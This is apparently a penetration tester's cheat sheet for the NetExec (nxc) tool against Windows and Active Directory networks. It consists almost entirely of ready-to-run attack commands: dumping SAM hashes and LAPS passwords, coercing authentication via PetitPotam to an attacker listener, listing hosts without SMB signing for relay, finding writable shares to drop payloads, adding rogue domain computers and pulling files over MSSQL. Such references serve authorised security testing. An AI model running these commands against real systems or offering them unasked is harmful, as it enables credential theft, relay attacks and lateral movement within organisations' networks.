# netexec (nxc)

nxc "is a network service exploitation tool that helps automate assessing the security of large networks."

# Basic SMB auth

nxc smb somehost -u user -p 'Winter2027!'

# Basic SMB auth (Kerberos)

I like to use getTGT, then export KRB5CCNAME=user.ccache and then here are some enumeration examples:

Enumerate domain users

nxc ldap domain.com --use-kcache --kdcHost domain.com --users

Connect to host with SMB:

nxc smb SOMECOOLSERVER --use-kcache

# Turn on logging

To log every nxc command and output to a file, find the nxc.conf file (in my Kali it was at /home/kali/.nxc/nxc.conf) and enable logging:

log_mode = True

# Change the Pwn3d label

You can make that something more professional if you want - just edit the /home/kali/.nxc/nxc.conf file and change:

pwn3d_label = Compromised!

# Find shares

nxc smb pcs.txt -u 'username' -p 'password' --shares

# Find only shares with READ or WRITE access

nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE

# Filtering shares

If you want to find just READ/WRITE shares for example:

nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE

Or just WRITE:

nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares WRITE

# Cleaning up share list from log file

If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky farmer payloads.

grep -i write log_2024-08-24-22-17-32.log | awk '{print $9,$10}' | sort > shares-i-can-write-to.txt

# Find hosts with/without SMB signing

nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt

# Find hosts with/without SMB signing (alternate way)

# grep for anything where signing is set to false

nxc smb pcs.txt -u '' -p '' > signingcheck.txt

If you want to get kind of fancy-pantsy you can take that grep to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name:

cat signingcheck.txt| grep -i "signing:False" | awk '{print $0 " " $4}' | sort -k4,4 > no-signing-for-these-folks.txt

# Find hosts running WebClient service

nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav

# Find pre-created computer accounts

nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k

# Dump SAM database

nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam

# Coerce authentication

The nxc wiki has an interesting page on this - talking about the various ways nxc can coerce authentication.

# Coerce via PetitPotam:

nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=pe

# Add computer to the domain

nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123!

# MSSQL commands

Lifted from the nxc wiki

# Execute database commands

nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'

# Get/put files

Get:

nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file..txt /tmp/file

Put:

nxc 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt

# Dump LAPS passwords

Using an account with rights to do so:

nxc smb VICTIMSERVER -u user-with-LAPS-reading-rights -p 'YerP4$$w0rd!' --laps